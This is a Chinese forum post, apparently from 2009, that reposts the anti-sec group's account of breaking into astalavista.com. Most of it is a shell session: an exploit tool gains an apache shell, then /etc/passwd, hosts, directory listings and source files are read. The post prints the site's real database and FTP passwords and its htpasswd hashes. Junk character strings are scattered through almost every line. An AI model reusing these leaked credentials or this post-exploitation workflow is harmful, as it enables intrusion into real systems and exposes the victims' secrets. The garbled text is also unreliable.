里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
( X6 W& K" X$ U" {" v0 M% w) x) D4 u1 o0 A8 S( v
[root@front3 ~]# curl -I litespeedtech.com y+ k/ J- B" x1 I8 H: {1 t
HTTP/1.1 200 OK
. G( i( |- o% ?Date: Fri, 05 Jun 2009 22:54:51 GMT* H, Q) p3 Q; T3 F% z
Server: LiteSpeed( O( L+ I. B6 X0 y% M
+ o ]; w' @6 y另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-" M* v1 N; p# z& H! J" g
$ }& l' A) r( g
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
) e7 }6 m8 d8 p Z# b; g# d) f0 m' J( Z$ [3 ~6 G7 e# o3 m
. |# t9 U S/ S$ u/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ * `4 x) t/ g* g( U- ]
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \1 ^6 l) Y% M0 S5 @* q' q3 b8 w2 _" N
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \' }# `! U5 I5 `9 e
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /- l. y2 G( x, y& _/ n0 B) a. w: l
\/ \/ \/ \/ \/ \/ \/* k9 F6 S* n# h. u7 m
The Hacking & Security Community' q4 P4 b* y, D0 _ g" f
[+] Founded in 1997 by a hacker computer enthusiast: S2 K& k/ I1 i7 ^* E
[-] Exposed in 2009 by anti-sec group
5 k4 l8 G/ s$ L1 ~3 Y0 Z, \7 m
) G3 F9 p, X1 U7 ^) }From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:- P& H2 \/ b' B% `/ K
>> 03. Who’s behind the site?
% _4 u! p& w, z: E) Z>>
% Q9 ?* }9 I0 L3 R! [>> A team of security and IT professionals, and a countless number of contributors from all over the world.
# t# h: M' R8 _- w$ \/ T2 d/ W3 j2 m- ?. r9 S h }: B
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?4 M7 n; u9 j% }2 f
>>" A0 i8 [# Q4 i0 P S& a
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and+ R& R7 i+ x, n$ }1 G8 x% D! ]
military institutions.
, y. u9 T6 n* H1 O4 X6 ]" r L9 ?& o>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.4 B4 y# Q7 L6 T/ u" f- b5 x2 W" A
$ w7 Q# s0 q9 z5 h; k% B8 s$ G
Why has Astalavista been targeted?' m) o. g% N: o! b v+ C& k9 X
0 i$ {+ L1 ?$ J6 c, N. rOther than the fact that they are not doing any of this for the “community” but- [4 L8 Z. C4 J- w2 y. e/ @
for the money, they spread exploits for kids, claim to be a security community
# G7 S% O( ?, ?& {- C(with no real sense of security on their own servers), and they charge you $6.66
9 I6 i( b8 F) s+ c0 w4 Sper months to access a dead forum with a directory filled with public releases
, y/ n. X/ M2 P- s7 e6 pand outdated / broken services.+ z, b1 _' w, q9 [+ A* H0 U0 y
0 [7 B. @0 f. J; }1 [We wanted to see how good that “team of security and IT professionals” really is.* [8 t1 y: f) m- I, H, _* H
- ^8 L+ ]) a$ w$ n$ d/ `# H& kLet’s begin.3 p+ K* L6 L0 a4 H
; P! |/ @- Z/ U* \% X( ^* K8 L
anti-sec:~# ./g0tshell astalavista.com -p 80+ W O' b' Q0 S+ }, r6 p
[+] Connecting to astalavista.com:80
7 z" l3 G) Z) j I: P[+] Grabbing banner…* Q" D5 z6 a5 u2 U( n, o+ X
LiteSpeed) Y( j4 k2 a' |( o2 Q% C" p
[+] Injecting shellcode…+ @: L- K9 s4 K& x% ]3 M
[-] Wait for it
0 n; V2 G. V" b# L6 g
; N3 o ^8 K+ a; R2 |0 w[~] We g0tshell
/ S. U9 j% g* ]" c& P1 muname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
$ p& h5 N5 \0 Z7 EID: uid=100(apache) gid=500(apache) groups=500(apache)
* y J3 V$ O% U+ S( z/ ?$ z% F7 X" z! c
sh-3.2$ cat /etc/passwd
9 F9 r5 ]: k1 {/ U: K' Rroot:x:0:0:root:/root:/bin/bash
( h4 k6 C$ {3 _bin:x:1:1:bin:/bin:/sbin/nologin4 P, V! q, m, o2 `! L5 x
daemon:x:2:2:daemon:/sbin:/sbin/nologin2 m6 |8 Y0 ^( Y, y1 n" n6 e T2 W
adm:x:3:4:adm:/var/adm:/sbin/nologin
' d5 \% g) K0 s/ I5 |/ ]- k; x4 Llp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
& g& @( [4 A% a- o$ A( bsync:x:5:0:sync:/sbin:/bin/sync' F9 v3 m. C& ~" ~3 s3 q- b* k
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
0 {: c/ a, E/ y( T/ T |0 }( U; Y5 Y1 Hhalt:x:7:0:halt:/sbin:/sbin/halt" g( M, @8 g) ?: W) s
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
% r. Q/ @+ A9 G5 ]news:x:9:13:news:/etc/news:3 u. k4 D- r7 y8 w# n8 w X
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin5 H; T+ V* ~* [( t- X
operator:x:11:0 perator:/root:/sbin/nologin) ?7 { k+ L5 E* U% I* {
games:x:12:100:games:/usr/games:/sbin/nologin
8 b* U5 a8 l* }* s0 Z0 sgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
* E' k; b2 k1 G6 Y; V2 v* Bftp:x:14:50:FTP User:/var/ftp:/sbin/nologin: x; n- ^4 L7 k' [! j
nobody:x:99:99:Nobody:/:/sbin/nologin
) L( K* w; f: mrpm:x:37:37::/var/lib/rpm:/sbin/nologin
2 p$ X# ?/ \( ?1 e# m; Q# r5 Z4 o" E4 Ndbus:x:81:81:System message bus:/:/sbin/nologin/ I1 V) [+ R" D8 T+ f( I& @
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
9 P# j# t# E' F1 Bmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin C; ]6 k/ d7 F5 L( K+ O% Y: v
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
8 o6 E x" H6 [$ k m" p- C9 A' Cvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
: T) V% A9 P! g, k9 Y7 i0 a4 p rhaldaemon:x:68:68:HAL daemon:/:/sbin/nologin8 O8 b$ Y# J% _3 s" e
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin$ `1 U0 p4 Q; I! q" D" M i
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
+ |+ k2 S2 i0 e7 u- \( snfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin) o9 Q' u% h5 d5 O1 P2 u
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
6 I/ a: w* s" tpcap:x:77:77::/var/arpwatch:/sbin/nologin
& \* M$ p' j. q+ U8 \( Inamed:x:25:25:Named:/var/named:/sbin/nologin# K* p+ x- A" d! p1 r2 D( ?
apache:x:100:500::/var/www:/bin/false' t; l4 h6 D v2 O8 R d( ], b
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
5 y, V# e( P9 v# R! W0 Mmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
" q& q* R$ Y* x* m4 `3 Z# fwebapps:x:500:501::/var/www/html:/bin/bash5 n6 ]' ~& [, f- w9 j S
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash9 p: \1 U' r) \. E! P
admin:x:501:502::/home/admin:/bin/bash
0 g4 E% p& S5 |, t7 F9 H- W6 J9 v) ijon:x:502:503::/home/jon:/bin/bash
" I1 Y# R! Z* Q3 zcom:x:503:504::/home/com:/bin/bash( c$ y( L7 p- o7 P+ ]) V/ j+ Z
ntp:x:38:38::/etc/ntp:/sbin/nologin* s9 o8 O; w1 a2 d' x
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin' A8 u% g" Q6 N, I
astanet:x:504:505::/home/astanet:/bin/bash0 F6 j9 M6 E D1 a8 Z H0 E
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
K2 C. E3 J6 P" B& K$ R9 ?avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin9 ^( V# K. ^; ?& W+ t0 o/ v" M
! _* O* ]$ R; b, W( C6 r8 ?" S
sh-3.2$ cat /etc/hosts
; V, S; k9 }4 U( u; Z; A# Do not remove the following line, or various programs* Z( G" s7 Z) x4 V# B, E3 f+ ~
# that require network functionality will fail.# C5 v5 t7 i/ N" {1 G* M; Z" @
127.0.0.1 localhost.localdomain localhost
+ {& c+ H# H3 O" C1 r2 ?::1 localhost6.localdomain6 localhost6
2 w: l5 p2 v; F0 Y1 }2 ^# z80.74.154.172 asta1.astalavistaserver.com
5 R" X) T+ p) c- K& D. w0 r+ P- b& r+ S
sh-3.2$ pwd; a7 A! y% n* Y# q, p$ \: H
/home/com/public_html$ v4 b. w% h# T: M* v3 h
- d* _' N5 U) l' V5 e& f
sh-3.2$ ls -la4 {/ \8 k3 w2 v( H
total 18460: _! t/ P6 j" d* ?2 i( ?/ m7 h
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
8 x/ Z4 t, ]$ q/ e( L7 n. Edrwx–x–x 11 com com 4096 Jun 25 2008 ..
: \- \9 y3 l: f% Y; g4 adrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
$ Z: J& j2 @# q$ C# F; v9 }drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache$ R5 F5 R- B/ p1 D2 R; s
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
. P( z, \- P: Q2 g' f% Y6 j0 H9 bdrwxrwxrwx 2 com com 4096 May 19 00:50 config/ n) P* C2 \" c6 W9 U3 E
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core. T3 q) u6 z* ^( a. j" D& p1 |& i& G
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules6 J. z; r) S8 t4 p7 S
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing5 k) F+ D$ I K6 Y& T% E5 a
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo6 @ h# ^$ @8 t
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__* k, l2 Z- j8 ?7 h# I# f$ C _$ C
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php0 O5 m( r3 W* e
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd) d2 s5 o: O: Q7 R5 o
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
6 q, E2 z6 A. V& u& }) D) W-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
/ Q0 Z0 G) R3 P7 }drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed: u( m C1 _2 k4 W' I
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess# e# k6 ]& S6 ^; b
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak: E0 K6 |8 z# A8 o# h" c
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
0 B4 r( [: \0 Wdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool' v! M8 J1 `& E: h9 R8 [
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
T) I' ?3 H- h8 @. Y-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
! K1 I E7 P( ^/ p% g. Xdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
; c k! w- E" \0 e2 r; [7 vdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang% X$ G' k3 O& Y8 K
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib# _; m1 I6 z. A9 D
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
* e1 z: U! b/ C, K- b8 `5 _, [drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
u4 e6 J$ L2 adrwxr-xr-x 34 com com 4096 May 28 16:30 modules
! m$ |3 b4 Q$ S% R4 @; y1 mdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
9 l( [0 V( \- U, V {drwxrwxr-x 22 com com 4096 May 28 17:06 _new- I$ X$ P0 b; K/ H8 C3 m
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old- q! ^* T) \6 u& y9 ^0 S
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy( P8 G" i4 v* }( e$ b1 q5 ~8 L9 I
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
- g9 ?, T' V% b' E# Q' X-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
6 t0 o0 T+ k4 b3 v2 h-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml) ?, Z6 k1 ^; A. i; `6 N
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php0 o% a* ]0 G; l) O0 A+ v
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes+ j0 E1 x$ i9 O$ {7 X
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp0 i6 ?+ X* ~9 m* E+ P# X
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam" F: O6 r$ ~: o* H
: ~% C% k# z; b8 T6 f
sh-3.2$ head -20 index.php
, Y' `$ ^- ~: K; f0 ^<?php, L3 B# |1 @* E, e. e) x2 O
+ c# v6 y* I% P" [/**5 m9 M y o0 }6 R! P" F3 J
* The main page for the CMS
1 r+ G6 v" J! ]% t4 C; L* @copyright CONTREXX CMS - COMVATION AG% Q. n9 g$ m5 ^0 c* @$ w* Q# w$ C
* @author Comvation Development Team
; k5 R3 y$ F' T) `7 i* @version v1.0.9.10.1 stable
% `8 M5 ~! l+ x7 m5 F* @package contrexx
+ I+ H* j' U; k* @subpackage core- V' U7 j( C4 m( V; u' q; P4 a
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage$ i! b/ E. z* n5 Z/ u; J
* @since v0.0.0.0. d0 m6 z/ j1 e* k6 }
* @todo Capitalize all class names in project0 E4 f8 L2 T: H' c# K
* @uses /config/configuration.php# ?# f- Z2 `, c
* @uses /config/settings.php) \- C# B3 [; N% i
* @uses /config/version.php
% W8 L. X' b1 J4 B* o* @uses /core/API.php2 r- i" g, k2 t) ^" Z. U3 `4 J+ f
* @uses /core_modules/cache/index.class.php
3 ^' A( N* N6 K- _0 A* @uses /core/error.class.php
, r7 j+ K' t- ]4 V' ^* @uses /core_modules/banner/index.class.php3 \4 b# [9 h3 I4 H4 ~6 F
* @uses /core_modules/contact/index.class.php. P$ f" K; ]2 U4 X
Z( a. R0 s2 G+ g( vsh-3.2$ cd config/
! W3 q5 V! t3 ^, U" Rsh-3.2$ ls -la
/ y$ G: E0 f H3 v" r, jtotal 32
+ W: U$ A$ i- V, W/ s, T# F) ]drwxrwxrwx 2 com com 4096 May 19 00:50 .. P7 T$ A' k2 [/ }. E$ d+ w- \) { \5 ~( s
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
2 D" @( Z' i7 c5 _. \1 z-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
) s; i+ a" j* L% I- X-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php6 I3 V5 t7 L) o! T+ l( w
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
5 w3 R2 _) w7 M, x-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php$ ], i, H# z2 m
9 y3 o! D+ F( J' a6 I* csh-3.2$ cat configuration.php' {! a y' J7 ]2 h! X& W/ k
[snip]
/ p9 z- C& [- {$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
8 D& O7 t- n$ E/ ?1 F n* W0 c0 L$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name0 ~0 G; M- h8 J; C0 n
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
- N4 o* @+ U0 N; P+ k- {# U/ h$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username+ |* S2 c! f( H! T7 L" _) s% Q
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
j/ m; P4 |+ X9 N" k$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)7 r$ ?' S+ F( A. U4 @2 Q
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..). f8 g' Q0 M5 E( ^$ U
[snip]
) ~* F$ k: G- s7 K1 d$_FTPCONFIG['is_activated'] = true; // Ftp support true or false$ t' ? E/ {$ [* S6 Z# Q$ i
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
/ R% e( B. s; f$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost2 [4 P6 h, ?. m7 w" z
$_FTPCONFIG['port'] = 21; // Ftp remote port! ?# g9 E. \6 G, d! T- z
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
6 I: \$ e5 i$ Y$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password& W5 d( X5 F7 p8 t B. y1 i
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms: p# M0 t+ I" d" ~9 L! C
3 x8 M8 t5 N# q7 ?sh-3.2$ cd ..' o+ a) X8 c) ^" G& ^' i# P
sh-3.2$ cd dvd/! @" w9 D9 i, l, ?
sh-3.2$ ls -la
" |3 \& I3 F6 m0 D) d) j2 f* D$ O Etotal 2913780& H" n4 E$ W' S+ w% P) Z: u
drwxr-xr-x 2 com com 4096 Sep 9 2008 .- {. p- t: T0 J' }
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
7 s8 _$ n0 E) q; _-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
; F7 D7 g# B1 R-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar( l t0 E1 _1 m8 ~- l$ [8 ]
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar/ M1 M, j+ ?+ U$ x: V! D
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess) ~2 R% i( h7 w! d
1 g- s6 @ G& f1 A# z7 qsh-3.2$ cat .htaccess# c: J3 S8 x0 G& o ?% C+ ?6 m
authType Basic# ?3 _3 \2 r8 b8 H7 L
authName DVD/ S6 r4 {) x p. V
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
$ s5 c# l' m- G$ v5 O0 Y3 [/ Xrequire valid-user9 _8 }4 c, q' P F7 ?8 p. e
5 D. i" k$ T3 ]1 g+ Qsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd1 J v3 S' v$ R. c( P/ x
DVDdownload:CRD8cuY6.MPT6
9 u9 S" d5 Q M( Z" x1 k- z8 C8 UDVDdownload2:CR8a36.wluFMg/ X' V. E5 L7 _5 r
G" n: y3 _: W8 i" G. r! Hsh-3.2$ cat test.php" c6 W. @. _/ Y' u* P) w
<?php
% G0 H- Y# ?) m" p: @$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;; ~: ^; T) q7 @5 O9 g
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
Y6 y/ Y3 p6 |6 _0 {echo $url;
6 a# ]: p( g! B$ E4 z* _4 E?>
' i5 i3 G1 Z _/ K8 a0 p4 I& }( f' `5 v5 ?0 I9 V5 }
sh-3.2$ cd modifications/
0 B% M2 f3 S% x& v- }sh-3.2$ ls -la% N4 a& \# z# [+ R1 \* v& w
total 321 \: D# j+ Z# j9 j$ M7 Q
drwxr-xr-x 8 com com 4096 May 11 12:48 .
6 c4 o) G( p* W2 F( Edrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
4 ]1 R( T0 ~- N" wdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
: p3 v; _6 V) t8 G8 J0 O/ `% D- \drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
- \6 C1 v7 I9 {, e, gdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
0 x( }& v% f2 U8 P/ ]9 E' W( @, G vdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
$ p- V' p* s$ e7 F; y, l2 a: zdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
- Y2 d; ?. E1 N' F0 i" I0 sdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
/ T: S7 t i* V: E1 @& @" I0 U- K7 X2 r: Z/ k4 j
sh-3.2$ ls -R
& o6 g$ X9 P% F.:
" |1 g2 _- D/ L, ^1 pcom_avtng cronjobs onlinetools pjirc search _tmp
. ?) [" z; K1 k1 u D# I/ z4 r" m) q
./com_avtng:6 f" d& E. `. |: a b$ U
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts& Q% P" `* g( D$ e- H
; d) m* |; U7 k8 N4 T
./com_avtng/scripts:
1 H% F I- g" p; Npopunder.js
: C1 i) J4 O7 o: \1 G3 E6 \
8 ~- a- R( Y1 o5 v./cronjobs:
9 \, B( n- s( M6 g! l& mexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
3 i$ t0 ?3 M7 x: H8 T1 Y5 o0 Q
$ v z9 ~6 i9 A' Y- p' s./cronjobs/tmp:2 W* R5 V+ z8 S6 c! t! O
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
: l) l( Z% G3 J! h* H
, x6 R' r3 ?( d$ ^* ^5 F+ @./onlinetools:( I' z; X- p" ^2 I8 X
index.php& x" U2 m- V% ]& z
) P0 u7 E' o+ ^! s$ e./pjirc:# G, n+ r" ~! Z; l" U2 v0 i
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
8 ]! H; j/ D5 K& Z+ P: @& YAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
7 g& i7 j) q% q5 x, Pbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
3 D1 h( V$ z& j" ^
, A& C( l! I; L, w, p./pjirc/img:5 s& B% S0 }* E/ u! A$ H1 y4 W1 B) t
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif% _7 u4 k) v" l$ K* O
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
2 j' i+ v: s; c- n" h5 `$ rverre-eau.gif
, J4 h& e$ t( k/ R4 P8 Fargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
* c5 J% f; L1 a! ^4 tverre-vin.gif7 H( p/ j* [) Y1 V$ i- g# t) `. `
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
5 c0 c7 Y" X0 s: K+ k; j) Pbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif$ {3 O7 v0 b0 ~& q3 N3 @
$ J" z; J* q' j/ z5 d: [
./pjirc/snd:
8 Z$ i4 Q6 J/ N- I5 ~$ o7 Obell2.au ding.au
& j" e6 A4 W: |9 f7 Z p/ i/ H* T9 g) F) z9 R2 j8 e
./search:) a0 C; t0 k+ `+ q0 c g
searchEngines.php search.php7 d$ G0 w' ]' d
2 Q8 d, L' m6 R* k0 v A- [./_tmp:0 t, j2 y! Y3 E- m1 N- f/ ]! g) N
defaultPorts.php defaultPorts.txt- ?$ V1 X4 z0 B" t
; M+ u, v( ~ U: L
sh-3.2$ cd cronjobs/
7 a. b% c% V4 L6 ksh-3.2$ cat exploits.php
4 k) ?8 B& d: s$ u* r/ S[snip]
^& ?& m0 A% L$categories = array();* E: G2 r5 g A- R. o
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;+ L" P6 h( _* K2 T2 k' I
$expolits = file($milw0rmFile);
0 A/ q: i% h' |. Z: m n+ w& u$comExploits = array();; N; P0 u3 s+ z& V
[snip]
7 |& G/ v; @7 c" X, I, k// manage data( V+ g% E0 F3 o9 h4 w% u8 N
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
/ m, L7 z& O: d- j
P" Y. ~2 H2 H0 I/ F1 E$ x5 p. x // get path and title
# b& u- k4 a+ y0 c6 n& K a3 M $expolits[$x] = trim($expolits[$x]); s% L C# V4 `7 M3 h7 @# j6 }& m" ]
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));: c& J: x: d8 p7 x! G
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
: \8 C) d8 O% F" E9 {4 a. Q6 @. [: r1 L1 `2 T! j
// check if file exists
% f4 L! i/ E9 x ^% K H if (file_exists($path)) {7 ^3 f% o/ B, b- X
3 E( v, j8 w2 I2 U8 q$ u7 G; s0 w" T+ J% B $text = file_get_contents($path);; Q g5 S8 I8 E& k, O6 B
# E) }# U, P) S1 _+ F // get content and date
, p/ k& ], x* u, x- r- ] T //$text = htmlspecialchars($text, ENT_QUOTES);
3 U; _" U2 `, S8 B $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
& ]; ^4 J% V% s) i9 ] if ($tmptext != ”) {! k; q6 ]+ ~, F" @6 @% _
$text = $tmptext;
$ [: G$ f j7 ?" ?7 U } else {6 e J1 F) a! p: ^
$text = addslashes(htmlentities($text, ENT_QUOTES));! u4 x0 b9 |& z2 F, F) R! P
}0 H( y5 r) O: N9 ?, b! n
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));; {$ L4 Q) b1 C8 |1 `6 H8 w" }8 Y' g. u
$tmp = explode('-', $date);& J" k# n$ x9 P6 d1 T
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));6 w. y* t: z; f8 U- _8 l
$cat = getCategory ($path);
" }. E% t+ b4 P8 P3 m6 s $ext = pathinfo(basename($path));
~# y: A+ ` B. W9 n4 |, J $ext = $ext['extension'];
: y9 [$ C t/ |* }) r7 l, K; X4 a $qStr = ”0 p! R. y y" E: c, |. x6 N6 L
SELECT `id`
+ z& \6 Q. `0 q" O FROM `contrexx_module_exploits`
1 G) d. o+ U D' _) P8 v( Q WHERE `title` = ‘” . $title . “‘
/ \! O1 `/ A( i( Q$ |1 P AND `date` = ‘” . $date . “‘
* a x, d ~ ?; B) @ “;
( u: k7 E( p. P6 \- G; m echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;8 m1 H" l! P( M% \/ r6 [: G
$q = $_objDB->query($qStr);
) \/ } S9 _: `. w, i$ D9 J& R$ }. ]3 p2 H- O; U# B0 I& x( ^
if ($q->numRows() == 0) {
' u2 b" b' Y: t O& u
4 `) O9 |! |# H) X9 b8 w // prepare array) U' \! t: l! s! h5 c$ D+ U
$comExploits[$x]['date'] = $date;+ J: a$ o* s; g* P8 U
$comExploits[$x]['title'] = $title;( W, k8 P2 y, L$ `) J Y
$comExploits[$x]['author'] = ‘milw0rm’;
7 \1 R+ {4 k- u7 }6 F% B $comExploits[$x]['text'] = $text;
% [# g2 Y* ~% a+ R7 W4 K $comExploits[$x]['source'] = $ext;, z! N1 G* E6 ~5 I
$comExploits[$x]['url1'] = ”;
% i: R2 x$ Q$ b $comExploits[$x]['url2'] = ”;# a! v, B. l# d0 N
$comExploits[$x]['catid'] = $cat;
% {" x1 @2 g* }7 h $comExploits[$x]['lang'] = ‘2′;5 ?' J0 j2 L) C' V; A r1 o
$comExploits[$x]['userid'] = ‘12′;' y$ G" q% R/ f- V( u6 c
$comExploits[$x]['startdate'] = ‘0000-00-00′;
! w0 V+ C- Z# V( S# W- d $comExploits[$x]['enddate'] = ‘0000-00-00′;* g( \: X( `8 L6 s
$comExploits[$x]['status'] = ‘1′;
" u* t0 a& P& j) F $comExploits[$x]['changelog'] = $date;
* m: {& I9 B0 i9 O8 o; N. t- U$ S6 ?7 I, H! K& C: I+ C
}
( X" w W! \% g) x. z6 S6 H1 r0 B) ?[snip]
) a" J- @* _3 q! b$ ^# ]: J $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
